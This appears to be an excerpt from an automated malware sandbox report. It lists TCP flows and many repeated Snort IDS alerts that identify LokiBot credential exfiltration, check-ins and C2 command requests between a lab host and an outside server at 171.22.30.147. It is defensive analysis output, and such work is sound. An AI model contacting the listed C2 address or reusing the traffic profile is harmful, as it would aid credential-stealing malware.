Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49185
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 171.22.30.147:80
Source: global traffic TCP traffic: 171.22.30.147:80 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80

Networking

Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49184 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49185 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49186 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49186
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49187 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49187
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49188 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49188
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49189 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49189
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49190 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49190
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49191 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49191
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49192 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49192
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49193 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49193
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49194 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49194
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49195 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49195
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49196 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49196
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49197 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49197
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49198 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49198
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49199 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49199
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49200 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49200
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49201 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49201
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49202 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49202
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49203 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49203
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49204 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49204
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49205 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49205
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49206 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49206
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49207 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49207
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49208 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49208
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49209 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49209
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49210 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49210
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49211 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49211
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49212 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49212
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49213 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49213
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49214 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49214
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49215 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49215
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49216 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49216
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49217 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49217
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49218 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49218
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49219 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49219
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49220 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49220
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49221 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49221
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49222 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49222
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49223 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49223
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49224 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49224
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49225 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.22:49225
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 171.22.30.147:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 171.22.30.147:80
